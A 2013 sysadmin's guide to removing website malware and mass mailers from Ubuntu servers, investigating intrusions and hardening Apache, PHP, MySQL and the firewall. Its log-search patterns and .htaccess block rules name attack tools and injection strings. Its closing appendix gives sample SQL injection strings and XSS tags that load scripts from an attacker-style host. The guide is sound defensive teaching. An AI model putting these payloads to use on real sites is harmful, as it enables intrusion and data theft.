I am a danish programmer living in Bangkok.
Read more about me @ rasmus.rummel.dk.
Webmodelling Home > Ubuntu Web Server Security & Website Malware Removal

Ubuntu Web Server Security

Updated 10 Apr 2013 This page contains 4 web server security related actionable step-by-step guides :

  • How to remove malware from Ubuntu hosted websites.
  • How to remove mass emailers from Ubuntu hosted websites.
  • How to investigate an intrusion after it happened.
  • How to hardenen an Ubuntu web server.

@ Favourite Design while we are not a hosting company, we do host most of our customer websites. From time to time a website is hacked and while most of the time we can restore from backup, we still use too many resources to fight website malware and even worse our customers inevitably gets less happy with us. I decided we need to be more efficient fighting and have started this page to buildup knowledge and to make that knowledge actionable.



Browser warnings

Both Firefox & Chrome are warning their users if they try to navigate to a site that is believed to host malware. Below is how this warning looks like in Chrome & Firefox : (Chrome calls them malware infected sites or phishing sites dependent on the type of attack while Firefox calls them attack sites)

Actually, the browsers are not testing each time a user is trying to download the website, instead Google maintains a central suspicious urls database and both Firefox & Chrome browsers will periodically contact the Google central suspicious urls database to update their local cache of suspicious urls (or hashes thereof).

Google will add your site url to its suspicious urls database even if your site is not hosting malware itself, it is enough that your site link a resource that does, eg. either through an iframe or through a script tag.

You can check a url against the google suspicious urls database here : http://google.com/safebrowsing/diagnostic?site=http://example.com (change example.com with the url you want to check).

Then Google removes a url from the central suspicious urls database, your Chrome or Firefox browser will first need to update their local suspicious url cache before the url will not any longer trigger a malware warning in that particular browser.


Malware removal procedure

To remove the malware and get Google to remove your url from the central suspicious urls database :
(the malware removal procedure will rely heavily on 3 linux commands : find, sed & grep)

  1. Remove malware :
    1. Backup website : (so if you later by mistake delete or alter files you should not have deleted or altered, you can easily restore the files back)
      1. Navigate to the web root parent folder.
      2. shell> tar cf WebRootFolderName.tar WebRootFolderName : create an archive of your web folder (tar is recursive).
    2. Investigate all your .htaccess files for suspicious redirects, especially remember to horizontal scroll as some malware redirects are sought hidden far to the right in the .htaccess file.
      1. Navigate to the web root parent folder.
      2. shell> find WebRootFolderName -name ".htaccess" > htaccessFiles : write a list of all .htaccess files in the website.
      3. shell> find WebRootFolderName -name ".htaccess" -print0 | xargs -0 -I % bash -c '{ echo "NEWLINE$%NEWLINE"; cat %;}' > htaccessAll : if you have many .htaccess files throughout your website, it is convenient to concatenate all your website .htaccess files into one handy file, htaccessAll, for easy investigation (I am sorry for the 2 NEWLINE - I could not find out how to construct a new line at these 2 places).
    3. Run ClamAV against the website :
      1. Install ClamAV if not already installed :
        1. shell> apt-get update : update your local package index so that you will install the newest version possible.
        2. shell> apt-get install clamav : easy like that.
      2. shell> freshclam : update virus definitions.
      3. Navigate to the web root parent folder.
      4. shell> clamscan -i -r WebRootFolderName : scan the web root folder recursively (-r) and show all infected files (-i).
      5. Investigate any infected file :
        1. For files that are all malware files, just delete them.
        2. For files that contains malware, but you cannot clearly identify the malware pattern, restore the files from earlier backup or delete the malware manually.
        3. For files that contains malware and you can identify the malware pattern, do the following :
          1. Navigate to the website root folder.
          2. For each malware pattern execute the following command :
            • shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/BEGINPATTERN.*ENDPATTERN//g;p}' {} \; : will find all files recursively and within each file delete all strings beginning with BEGINPATTERN and ending with ENDPATTERN even if the string contain new lines.
      Note that AV scanning is only a small part of the removal solution because :
      • Often the virus is not on your server, but is instead linked using eg. iframes or javascript tags to load the virus from remote computers so the typical AV scanner will not see the virus.
      • Lots of virus is changing signature daily or even each time it is served making it difficult for AV scanners to identify it.
    4. Search the website for all new and changed files since a specific date :
      1. Navigate to the website root parent folder.
      2. shell> find WebRootFolderName -newermt '2013-01-14T03:30:00' : search for files that are new or modified AFTER 14. Jan 2013 3:30 am (note that -newermt is not available on older versions of find).
    5. Search the website for iframes :
      1. Navigate to the website root parent folder.
      2. shell> find WebRootFolderName -exec grep -l "<iframe" {} \; | tee filesWithIframes : list all files that have an iframe, both display the list on screen and write them to a file in case it's a big list.
      3. Investigate the files and if you find malware iframes, see if you can match a pattern for how the malware iframes are written :
        1. Navigate to the website root folder.
        2. For each malware pattern execute the following command :
          • shell> find . -type f -exec sed -i s%BEGINPATTERN[^\<]*URL[^\<]*ENDPATTERN%%g {} \; : will find all files recursively and within each file delete all strings beginning with BEGINPATTERN then somewhere containing URL and at last ending with ENDPATTERN. This command only works if the full malware pattern is contained within one line (also note the use of '[^\<]*' instead of '.*' to avoid the greedy behaviour of sed).
            • Typical BEGINPATTERN : document\.write\(\'\<iframe
            • URL : this is the url that points to a page that will load malware, eg. ayblsn\.pcanywhere\.net
            • Typical ENDPATTERN : \</iframe\>\'\)
    6. Search the website for suspicious javascript tags :
      1. Navigate to the website root parent folder.
      2. shell> grep -R "<script[^<]*src=[^<]*</script>" WebRootFolderName | tee javascriptTagsAll : this will give a list of all javascript tags, each tag prefixed with the filename. Fast look through the src-attribute to see if any look suspicious.
    7. Test for other typical malware patterns :
      1. Navigate to the website root parent folder.
      2. Execute the following scripts :
        • shell> find WebRootFolderName -type f -name "*.php" -exec grep -l "\$s=substr(8,1)" {} \; | tee malwareFiles_substr : the $s=substr(8,1) is a BEGINPATTERN of a long number encoded malware pattern (I have never found this pattern outside php files). To remove :
          1. Navigate to the website root folder.
          2. Execute the following command :
            • shell> find . -type f -name "*.php" | xargs sed -i s/\$s=substr.*$//
        • shell> find WebRootFolderName -type f -exec grep -l "<\!--c3284d-->.*<\!--\/c3284d-->" {} \; | tee malwareFiles_c3284d : the <\!--c3284d--> is a BEGINPATTERN of at least 2 different attacks. To remove :
          1. Navigate to the website root folder.
          2. Execute the following command :
            • shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/<!--c3284d-->.*<!--\/c3284d-->//g;p}' {} \;
        • shell> find WebRootFolderName -type f -exec grep -l "<?php if(isset.*default_action="FilesMan".*/<?" {} \; | tee malwareFiles_massMailer
          1. Navigate to the website root folder.
          2. Execute the following command :
            • shell> find . -type f -exec sed -i 's/<?php if(isset.*default_action="FilesMan".*/<?/g' {} \;
    8. After cleanup : (some would say before cleanup)
      • Change all passwords :
        • FTP accounts
        • Panel accounts (eg. cPanel, ISPConfig etc.)
        • CMS/Backoffice user accounts
        • Database connection passwords
      • See Intrusion investigation to try to identify how the hacker gained access, otherwhise the hacker may just do the same thing again.
      • See Web server hardening to try to build a better hack shield.
  2. Request Google to remove the website from the suspicious urls database :
    1. Register the website domain with google webmaster tools :
      1. Sign in @ http://www.google.com/webmasters/ (using your google account, eg. your gmail account)
      2. Click the "ADD A SITE" button and add your domain.
      3. After adding your domain, you need to verify that you are the owner - follow the 4 steps as outlined by google ending with clicking the "VERIFY" Button.
      4. After clicking the "VERIFY" button, you better see this. Then click on the "continue" link.
      5. As this site is newly added to webmaster tools, there will likely not be any data yet.
    2. Request removal :
      1. Then data arrives for your site, you can navigate to "Health > Malware" and if google have found malware, you will get a "Request a review" button - click it.
      2. You will get a popup there you confirm that you have tried to remove any malware. I also like to use the comment box, if it's read by any human I would think it speeds up the process. Click the "OK" button.
      3. Now you will have to wait. Google does NOT contact you eg. by email then they have made a decision whether to remove your url from their suspicious urls database. You may check back at webmaster tools later to see how it is going or you may simply just wait and see if Chrome & Firefox stops the malware warnings.


Mass emailer removal

Mass emailers are also malware, however they deserve need a little more indept removal guide than the above.

It can be very frustrating to see your webserver being taken over by mass emailers and while many mass emailers will be identified by the above malware removal process, some will not, in which case you need to identify the php scripts from which the spam mails originates.

  1. Confirm that your webserver is sending out spam :
    1. shell> tail -f /var/log/mail.log : dynamically print log entries to screen - if one or more mass emailers are active, you should see a constant stream of new log messages and based on the addresses it is quite easy to determine if the messages are legicit (send from your websites) or spam (send from mass emailers).
    2. shell> mailq : a huge mail queue on a webserver with websites sending a few legicit emails is a strong indication that mass mailers are active (actually there may be so many queued mail messages that mailq cannot list them).
    3. shell> ls -l /var/spool/mqueue | wc -l : count the mail messages in the sendmail MTA (Mail Transfer Agent) queue. If you have a mass emailer problem, there will typically be many thousands of email messages.
    4. shell> ls -l /var/spool/mqueue-client | wc -l : count the mail messages in the sendmail MSP (Mail Submission Program) queue. Note that mailq is actually listing the contents of mqueue & mqueue-client.
  2. If not already scanned for malware in the above malware removal guide, scan for mailware now :
    1. Install ClamAV if not already installed :
      1. shell> apt-get update : update your local package index so that you will install the newest version possible.
      2. shell> apt-get install clamav : easy like that.
    2. shell> freshclam : update virus definitions.
    3. Navigate to the web root parent folder.
    4. shell> clamscan -i -r WebRootFolderName : scan the web root folder recursively (-r) and show all infected files (-i). Typically the mass emailer will be installed inside of your web root folder.
    5. Investigate any infected file :
      1. For files that are all malware files, just delete them.
      2. For files that contains malware, but you cannot clearly identify the malware pattern, restore the files from earlier backup or delete the malware manually.
      3. For files that contains malware and you can identify the malware pattern, do the following :
        1. Navigate to the website root folder.
        2. For each malware pattern execute the following command :
          • shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/BEGINPATTERN.*ENDPATTERN//g;p}' {} \; : will find all files recursively and within each file delete all strings beginning with BEGINPATTERN and ending with ENDPATTERN even if the string contain new lines.
  3. Configure PHP mail to insert a header in each email that shows the php file that sended the email and shows under which user the php file was executed :
    1. Identify the php.ini file you need to change : as you may have multiple php.ini files on your system and different websites may use different php.ini files, it may not be possible to know which php.ini file you need to change unless you know which website is sending out spam. For reliable result, you should actually change them all :
      • shell> php -i | grep php.ini : this will show you the php.ini file in use for the php command line - this is not necessary the same php.ini file in use for your websites.
      • /etc/php5/ : contains all your php.ini files.
    2. shell> nano /etc/php5/cgi/php.ini : open php.ini in the nano editor (most of my websites runs PHP as CGI)
    3. Make sure you have the following property and that it is un-commented : (search for mail.add_x_header)
      • mail.add_x_header = On : this will make PHP mail insert the originating php script and the UID by which the script was executed in all mail headers.
    4. Press ctrl+x and then y to close and save the php.ini file.
    5. shell> service apache2 reload : be sure that whatever your PHP mode that changes to php.ini are applied.
  4. Examine emails for the header that shows what php file sended the email :
    1. shell> cd /var/spool/mqueue : change directory to the mqueue folder.
    2. Find UID and originating script of one of the mails in mqueue :
      1. shell> ls -l : list all files in the mqueue folder.
      2. shell> cat qfr2L261A* : select one of the files and print the content to screen using cat and the filename.
      3. Look for X-PHP-Originating-Script and if found you can read out the UID and script name - in my case it is :
        • UID = 1004
        • Script name = press.php : this is my mass emailer.
    3. shell> find /var/www "press.php" : locate the script file.
    4. If you are using ISPConfig, it is also interesting to identify the website like this :
      1. shell> cat /etc/passwd | grep x:1004 : get the default folder of UID=1004 - in my case /var/www/clients/client40/web117 : I know now in which website press.php exists.
  5. Delete the mass mailer script :
    1. You need to look at the mass emailer script that it is not a legicit script appended the mass emailer code - you don't want to delete a legicit script.
    2. You should also take note of the date, the script was modified or uploaded - more malware may have been uploaded together together with the mass emailer.
  6. You may have way more than 1 mass emailer - go back to main step 1 and check if your webserver is still sending spam.
  7. Tighten your Firewall : allow only relevant mail programs to make connections to the internet on port 25
    (here using UFW (Uncomplicated FireWall) which is a frontend for IPTables)

    Some mass emailers may be self contained not using your MTA (on most webserver installations sendmail is used as MTA) consequently not writing to mail.log nor using the mail queue - I don't know how to find that kind of mass emailers, but I do know how to stop them :

    After you have setup blocking outbound smtp except for your own MTA, you can check the firewall log (in case of UFW : /var/log/ufw.log) to see if you get any outbound block on port 25 - if you do, then you know that there is a selfcontained mass emailer on your system.

  8. Check if your webserver is listed at any blacklist servers :
    1. Navigate to any of these blacklist checkers :
    2. Submit the IP address of your webserver to rbls.
    3. Result of IP 27.254.33.57 (my webserver) - it looks like I am listed on 5 blacklist servers, however actually it is only 2 : barracuda and cbl (the 3 spamhaus listings comes from cbl).
    4. Follow all the blacklist server links in the red blacklist section and request to be removed, one blacklist server at a time.
    5. If your server is blacklisted at Microsoft so that you cannot send email to hotmail, then signup to at Smart Network Data Services to try to resolve the situation (it is going to take a long time)
    6. Note that your server IP may just be in a bad neighborhood. If other servers on the same network is sending spam or otherwise are malicious, then some blacklist servers will blacklist the whole network, eg. apews.org and noteably Microsoft. In such a case, that other servers on your network but not within your control are malicious, you may not be able to solve the problem. The only solution may be to install your server on another network.


Intrusion investigation

Note : this guide is in beta release.

How did the hacker compromise the system ? - this is a crucial question because if that particular method is not counter measured, then all the cleanup is wasted as the hacker can just come back and abuse your site again.

  • Log file analysis : (Online hack attempt identifier there you can upload you log files for analysis)
    1. Check the Apache config file : /etc/apache2/apache2.conf for the LogFormat directive that defines named formats for access logs.
    2. Check the Apache vhost config file : /etc/apache2/conf.d/other-vhosts-access-log to see the format for vhosts access log.
    3. Apache main access log file : /var/log/apache2/access.log : see Appendix : Log file formats to understand the Apache2 access.log :
    4. Apache vhost access log file : /var/log/apache2/other_vhosts_access.log default is vhost_combined format :
    5. Apache error log file : /var/log/apache2/error.log : there are no different formats for this log file :
    6. Apache ftp log file : /var/log/pure-ftpd : your ftp log files may be in a different folder. The format is :
    7. shell> cd /var/log/apache2 : navigate to the Apache log folder.
    8. Identify the log files that contains logs for the date of attack, here I assume it is error.log, access.log and other_vhosts_access.log.
    9. Search for sql injection :
      • shell> cat access.log | grep "insert\|update\|replace" : search for sql injection attacks.
    10. Search for RFI & LFI attacks :
      • shell> cat access_log | awk ' $7 ~ /?/ && $7 ~ /http/ {print $1 $4 $7 FILENAME }'
    11. Search log files for put :
    12. Search for brute force attacks :
      1. Identify all login pages.
      2. shell> cat access.log | grep "MyLoginPage"
  • Search for Apache exploits :
    1. shell> updatedb & : update the locate database.
    2. shell> for i in `locate access_log`; do echo $i; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i; done (see steps-to-investigate-hacked-linux-=server
    3. shell> egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
  • Search for Shell code :
    1. shell> cat /path/to/access/logs/* | grep "/x90/"

If one of your websites are currently under attack and you want to get more log information to work with, you can change the LogLevel to debug for that website in the apache website configuration file (just search the configuration file for LogLevel).

Example :

I found this in our log file : http://search.yahoo.com/search;_ylt=A0oG7l_bp1BRqFEAOBhXNyoA?p=adm+login&n=10&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vst=0&vf=all&vc=th&vm=i&fl=0&fr=moz35&xargs=0&pstart=1&b=11&xa=K.zqLWvwdn5O.9s8qFHaiw--,1364326747
This link seems to a list of login pages to which credentials are known - the hacker pressed the link to our customers login page and logged right in as administrator



Web server hardening


attachking web applications
  1. Hardening Apache2 :
    1. Relevant configuration files :
      • /etc/apache2/apache2.conf :
      • /var/www/myWebSite.com/.htaccess : htaccess files are often used to change the properties for a specific website :
      • /etc/apach2/sites-available/myWebsite : each website has its own configuration file
        • <VirtualHost *:80> : configuration file root element which specifies on which IPs (*) & ports (80) this element can match a request.
        • ServerName myWebSite.com : property specifying for which domain this configuration file should be matched.
        • ServerAlias www.myWebSite.com : possible to specify many other domain names for which this configuration file should be matched.
        • DocumentRoot /var/www/myWebSite.com : the root folder for the website specified by the ServerName directive.
        • <Directory /> : collection of directives that applies only for the specified folder and it subfolders, so '/' will apply for ALL folders on the server.
        • <Order Deny,Allow>
        • <Allow from All> : default Apache2 configuration which is VERY dangerous as it allows Apache2 to serve any file mapped from a url (to the extent that Apache2 user have access to the file).
        • </Directory>
        • <Directory /var/www/pinkforms.com> : collection of directives that applies only for the myWebSite root folder and subfolders.
        • Options Indexes FollowSymLinks MultiViews : Options directive here sets that directory browsing is allowed (Indexes), that symlinks should be followed (FollowSymLinks) and that ?? (MultiViews).
        • DirectoryIndex index.html index.php : DirectoryIndex directive sets the default document, here index.html and if not exists then index.php and if that does not exist too, then either directory browsing or 404 error depending on whether the Options directive sets Indexes.
        • AllowOverride None : AllowOverride directive here states that no Apache2 configurations are allowed to be overridden eg. by .htaccess
        • Order allow,deny
        • Allow from All : here the "Allow from All" is less dangerous because it only applies from the webroot.
        • </Directory>
        • </VirtualHost>
    2. Change website configuration files : (here /etc/apache2/sites-available/myWebSite)
      1. shell> nano /etc/apache2/sites-available/myWebSite : open the apache2 configuration file for your website in the nano editor.
      2. Disable directory listing : to make it more difficult for a hacker to see what files are available in the website, otherwise the hacker may easily find the database connection and from there find any backoffice admin accounts and then you have lost.
        • <VirtualHost *:80>
        • ServerName myWebSite.com
        • <Directory /var/www/myWebSite.com>
        • Options FollowSymLinks MultiViews : remove the Indexes value from Options.
      3. Prohibit Apache2 to deliver files outside of webroot :
        • <VirtualHost *:80>
        • ServerName myWebSite.com
        • <Directory /> : he we use the all folders specification to set the default action on any folder on the server for the request handled.
        • Order Deny,Allow :
        • Deny from All : set Apache2 to deny deliver any resource.
        • AllowOverride None : set Apache2 to default deny override directives using .htaccess to avoid people making their websites less secure. If for a website it is necessary to override some settings (and it often is) then allow override for the specific folder.
      4. Press ctrl+x and then y to exit and save.
      5. Update Apache2 to use the new configuration file :
        1. shell> a2dissite myWebSite : prepare to remove myWebSite from /etc/apache2/sites-enabled.
        2. shell> service apache2 reload : actual do the removing
        3. shell> a2ensite myWebSite : prepare to add myWebSite to /etc/apache2/sites-enabled.
        4. shell> service apache2 reload : actual do the adding.
    3. Permissions considerations :
      Default Apache2 is started by the root user, however then serving requests, Apache2 will instead execute with the permissions of the user set in the User directive.
      • shell> ps -ef | grep apache2 : show all users that have started apache2, the default will be one apache2 process started by root and all other by www-data (default www-data user is member of the www-data group).
  2. Hardening PHP :
    1. Turn off the following php options in php.ini : (if your own php code is not using them)
      • register_globals off : to avoid that any variable in the querystring is automatically useable by PHP code.
      • allow_url_fopen off : disable php ability to use fopen() to read remote files.
      • allow_url_include off : disable php ability to use include & require for remote file access (which should be some of the most common attack points for code injection).
      • display_errors off : should only be set on while debugging a problem, otherwise hackers may get vital information from creating errors.
    2. Using htaccess to block different attacks :

      # Block out any script trying to set a mosConfig value through the URL RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR] # Block out any script trying to base64_encode crap to send via URL RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR] # Block out any script that includes a <script> tag in URL RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] # Block out any script trying to set a PHP GLOBALS variable via URL RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] # Block out any script trying to modify a _REQUEST variable via URL RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) # Send all blocked request to homepage with 403 Forbidden error! RewriteRule ^(.*)$ index.php [F,L]</p>

  3. Hardening database access :
    • Each database should have their own user for connection so that if a hacker gain access to one database, he will not have access to more than that database. Also never ever use the database root or sa user in your code (I have seen this multiple times).
    • Are your running some scripts accessing the database (eg. database backup script via Crontab), then do NOT use the root user even if it is convenient (I have done this myself), instead use a dedicated user, eg. for database backup create a dedicated database user with the necessary permissions :
      1. shell> mysql -u root -p : log on to your MySQL database server as root.
      2. mysql> create user 'backup'@'localhost' identified by 'SomePassword'; : create the user to use for backup.
      3. mysql> grant select, lock tables on *.* to 'backup'@'localhost' : grant only the necessary privileges, that is: select and lock tables on all databases.
      Now use this backup user in your backup script instead of the MySQL root or other administrative user.
  4. Shield XSS attacks : (also see http://securityblog.howellsonline.ca/2013/02/indepth-cross-site-scripting/
    1. Review ALL your pages there user data is recieved and if possible implement dedicated filtering and escaping libraries to avoid XSS attacks : (eg. AntiXSS for .NET or OWASP ESAPI for PHP, Java, .NET and others)
      • Login, Register and Profile pages.
      • Comment tracks.
      • CMS/Backoffice pages.
  5. Firewall :
    A firewall is used primarily to specify on which ports and secondarily from which IP addresses your server accept incoming network traffic. A firewall can therefore primarily guard against attacks using network enabled services on your server you did not know was running and secondarily (and unreliably) guard against eg. countries from there you have identified most attacks.
    1. Install & configure UFW (Uncomplicated FireWall), the default firewall configuration tool on Ubuntu :
      1. shell> apt-get update : update your Ubuntu package list before installing the next programs.
      2. shell> apt-get install nmap : install Nmap portscanner (if already installed no harm is done).
      3. shell> nmap -sV -p 0-65535 localhost : scan all ports for services listening, in my example there is a lot of open ports that is not necessary for the function of the hosted website.
      4. shell> apt-get install ufw : install UFW (if already installed no harm is done).
      5. shell> ufw enable : UFW is default disabled (I have never have problems with UFW on a remote server cutting my current SSH session then enabling UFW).
      6. shell> ufw allow 22 : first things first - allow incoming traffic on port 22 so that you can SSH access your server.
      7. shell> ufw allow apache2 : if this is a web server then allow traffic to all ports specified by Apache2 (default only port 80).
      8. shell> ufw logging on : better enable logging in case you come under hack attack (/var/log/ufw.log default loglevel have low footprint).
      9. shell> ufw default deny : be sure that UFW is denying all traffic that is not explicitly allowed.
      10. shell> ufw status verbose : lets see the status of the UFW firewall, only the necessary ports are opened (I also allow connections to the Bacula file daemon on port 9102, otherwise my backup server would not be able to connect).
      11. remote shell> nmap -sV 27.254.33.97 : here I scan the ports from a remote server to confirm that no other ports can be probed than the once opened by UFW, check that the status of the not showed ports are "filtered", which means that Nmap does not get any response and therefore cannot even determine if the ports are closed (port 9102 is showed wrong by Nmap and is a known Nmap problem).

      Now a hacker will not be able to intrude the system by means of other services than we have allowed through the firewall. Depending on the services you need to deliver on your server, you will need to open different ports, eg. a name server typically run on port 53 and an SMTP server typically run on port 25 and so on (see Standard port numbers)

    Firewall for dedicated database server

    Say you have your databases on a dedicated database server and your websites on another dedicated web server, then your web code will need to connect remote to your databases - that is: you need to allow remote connections to your databases, which means a hacker can try gaining direct access to your databases.

    Solutions :

    • Tell your web developers to create database users that can connect ONLY from the IP address of the web server that hosts the web site :
      • mysql> grant all on MyDatabase.* to 'MyUser'@'WebServerIP' identified by 'MyPassword';
        However, this solution has 2 drawbacks :
        • If you move your web server to another IP or you move a website to another web server, it will break the database connection.
        • Your developers will often not comply because it is more convenient to create a user that can connect from everywhere, partly they don't need to find the IP and partly the same user can be used from their development machine.
    • Setup a network wide firewall rule : (this is there IP configuration of firewall rules actual are useful)

      Say you have a standard C-class 24 bit network, eg. 27.254.33.0/24, so that all your servers are on IPs belonging to that network, then on the database server you can setup a firewall rule that will allow connections on the database port (MySQL default use port 3306) only from IPs belonging to that network :

      • database server shell> ufw allow from 27.254.33.0/24 to any port 3306 proto tcp : allow IPs belonging to the 27.254.33.0/24 network to connect to port 3306 using TCP on any IP address binded on the database server.

      Now even if some of your database users are anonymous (granted access from anywhere), it is ONLY possible to connect to the database from IPs within your network.

    Firewall for virtual machine host server

    Say you have a server that host multiple virtual machine with many different services, eg. your web server and your database server are actual virtual machines on the same host server - your challenge now is that requests to any of these virtual servers actually needs to be routed through your host server typically on a network bridge.

  6. Automate malware scanning :
    1. Scan for viruses using ClamAV :
      1. Install ClamAV : (ClamAV is not the best antivirus scanner, but it is free and default used by the linux community)
        1. shell> apt-get update : update your package information cache.
        2. shell> apt-get install clamav : install clamav.
        3. shell> freshclam : update ClamAV signature database.
        4. shell> clamscan -r -i /var/www : do a manual scan to see how it looks like (here I scan /var/www recursivle (-r) showing only infected files (-i)).
      2. Automate running ClamAV :
        1. Create a script that executes clamscan and email the result :
          1. shell> cd /var/MyScripts : navigate to the folder there you keep your scripts (or create a new folder or use your home folder).
          2. shell> nano clamav.sh : open the nano editor to create a file called clamav.sh (or download clamav.sh)
          3. Insert the following code :
            • #!/bin/bash
            • SCAN="$(which clamscan)"
            • MAIL="$(which sendmail)"
            • MAILTO="YourEmail" : eg. rasmusrummel@gmail.com
            • REPORTFILE="/YourScriptFolder/clamav-report" : eg. /var/MyScripts/clamav-report
            • HOSTNAME="$(hostname)" : if you have multiple servers, you will want to know on what host this script was running
            • DIRECTORY="/var/www" : folder to scan recursively for virus.
            • echo -e "Subject: ClamAV report - " "$HOSTNAME" > $REPORTFILE
            • echo -e "\n----- Scan started : " "$(date)" " -----\n" >> $REPORTFILE
            • $SCAN -r -i $DIRECTORY >> $REPORTFILE
            • echo -e "\n\n-----Scan ended : " "$(date)" " -----\n" >> $REPORTFILE
            • $MAIL $MAILTO < $REPORTFILE
          4. Press ctrl+x and then y to exit and save.
          5. shell> ls -l : you should see the clamav.sh file in the list.
        2. shell> ./clamav.sh : execute the script to confirm that everything works and that you get a report in your email inbox.
        3. Run clamav.sh script every night using Crontab :
          1. Get your relevant environment variables :
            1. shell> echo $SHELL : my shell is /bin/bash.
            2. shell> echo $PATH : my path is /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games.
          2. shell> crontab -e : open crontab in default editor (likely nano).
          3. Insert the following code at the top of the crontab file (if not already there) :
            • SHELL=/bin/bash : use your own value.
            • PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games : use your own value.
          4. Insert the following code at the bottom of the crontab file :
            • 5 3 * * * /var/MyScripts/clamav.sh : execute the clamav.sh script 5 minutes past 3 in the morning every day of the month every month of the year and every day of the week.
          5. Press ctrl+x and then y to close the crontab file and save the changes.
        4. You should now get an email every morning with a clamscan report.
    2. IMPORTANT! Scan for new and/or changed files : since an attacker typically change or create new files, scanning for new and/or changed files helps you tremendously fighting hackers and to get an early warning. Scanning for new files is in my opinion one of the most important things to do and it is easy too.
      1. Create a script that executes the find command and email the result :
        1. shell> cd /var/MyScripts : navigate to the folder there you keep your scripts (or create a new folder or use your home folder).
        2. shell> nano newfiles.sh : open the nano editor to create a file called newfiles.sh (or download newfiles.sh)
        3. Insert the following code :
          • #!/bin/bash
          • MAIL="$(which sendmail)"
          • MAILTO="YourEmail" : eg. rasmusrummel@gmail.com
          • REPORTFILE="/YourScriptFolder/newfiles-report" : eg. /var/MyScripts/newfiles-report
          • HOSTNAME="$(hostname)" : if you have multiple servers, you will want to know on what host this script was running
          • DIRECTORY="/var/www" : folder to scan recursively for new files.
          • DAYSPAN=1
          • STARTTIME="$(/bin/date --date="-$DAYSPAN day" +%Y-%m-%d)T04:30:00"
          • echo -e "Subject: NewFiles scan report - " "$HOSTAME" > $REPORTFILE
          • echo -e "\n----- NewFiles scan started : " "$(date)" " -----\n" >> $REPORTFILE
          • find $DIRECTORY -newermt "$STARTTIME" >> $REPORTFILE
          • echo -e "\n\n-----NewFiles scan ended : " "$(date)" " -----\n" >> $REPORTFILE
          • $MAIL $MAILTO < $REPORTFILE
        4. Press ctrl+x and then y to exit and save.
        5. shell> ls -l : you should see the newfiles.sh file in the list.
      2. shell> ./newfiles.sh : execute the script to confirm that everything works and that you get a report in your email inbox.
      3. Run newfiles.sh every night using Crontab :
        1. Get your relevant environment variables :
          1. shell> echo $SHELL : my shell is /bin/bash.
          2. shell> echo $PATH : my path is /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games.
        2. shell> crontab -e : open crontab in default editor (likely nano).
        3. Insert the following code at the top of the crontab file (if not already there) :
          • SHELL=/bin/bash : use your own value.
          • PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games : use your own value.
        4. Insert the following code at the bottom of the crontab file :
          • 5 4 * * * /var/MyScripts/newfiles.sh : execute the clamav.sh script 5 minutes past 4 in the morning every day of the month every month of the year and every day of the week.
        5. Press ctrl+x and then y to close the crontab file and save the changes.
      4. You should now get an email every morning with a new files report.
  7. Run a web vulnerability scanner to help you identify more web site vulnerabilities. Many more web vulnerability scanners @ SecTools web scanners
Here is the default directory configuration in the apache2 website config file :

Appendix : Typical hacker methods


attachking web applications

The most important methods hackers are using to gain access to in particular linux web servers and how to counter measure those methods. The Web Hacking Incident Database have statisticks on top attack methods.

  • SQL Injection attacks by submitting sql snippets into form fields trying to get the php, asp.net or other web code to execute rogue sql against the database with the intend to display database content, change database content, destroy database content or create errors that display configuration values.
    SQL Injection Example : say you have a search page, search.php, and on that page you have the following the sql : "SELECT * FROM users WHERE name = '" + UserName + "'" where UserName comes from the search box on search.php. Normally you would put in a name in the search box, eg. rasmus, and search.php would display information about rasmus if the user exist. However a hacker could input ' OR '1'='1 which would give the following sql : "SELECT * FROM users WHERE name = '' OR '1'='1'", you can see that this will display ALL records from the users database.
    SQL Injection Example 2 : on the same search page, the hacker now submit the following rasmus;select * from userinfo; and if multiple queries are allowed, everything from userinfo is now selected (php mysql_query does not allow multiple statements in one call).
    SQL Injection Counter measure :
    • Escape special database characters, eg. pings, on user submitted values.
    • Validate the submitted values, eg. if you expect an integer then don't allow a string (eg. "1;drop users;" would be a nasty string if you expect eg. a an article number)
    • In PHP use the PDO extension to filter all user input before using it against the database.
  • Cross Site Scripting (XSS), refers to attacks there a hacker uses some form of user input, eg. form fields, to inject malicious code into a webpage with the intent to get that code executed in other users browsers. XSS is a popular hacking method because so many websites are using user generated data on their pages so hackers can also put data on these pages. The Cross Side Scripting name I think is coming from the fact that the malicious code in the web page is coming from an external source.
    XSS Example : say you have a page with a comment track and a hacker were to write a comment that contained eg. an iframe that points to his own bad.php page like <iframe src="http://rusiahackers.ru/bad.php" />. Every time a user were to load that page in a browser, the browser would load http://rusiahackers.ru/bad.php which would be able to do many things in the browser, eg. load a javascript file that would change all links on the page to the hackers web page trying to lure the user to give up information, eg. login credentials or credit card information. While iframe and script tags are popular, a lot of other tags can be used, here is a few :
    • <iframe src="http://rusiahackers.ru/bad.php" />
    • <script src="http://rusiahackers.ru/bad.js">
    • <div style="background-image: url(javascript:something)">
    • <link rel="stylesheet" href="javascript:something;">
    • <table background="javascript:something">

    XSS Counter measure :
    • Filtering inputted data by stripping all relevant tags or at least validate user data. While many programmers will use eg. regular expressions to delete script, iframes and possible some other tags from user data, this is not recommendable mostly because there are quite many tags that can be used in ways you have not been thinking about and also your regex fu is most likely not as good as the hackers. Instead you should use a dedicated library like XSS Protect (for Java), HTML Purifier (for PHP) or AntiXSS (for .NET).
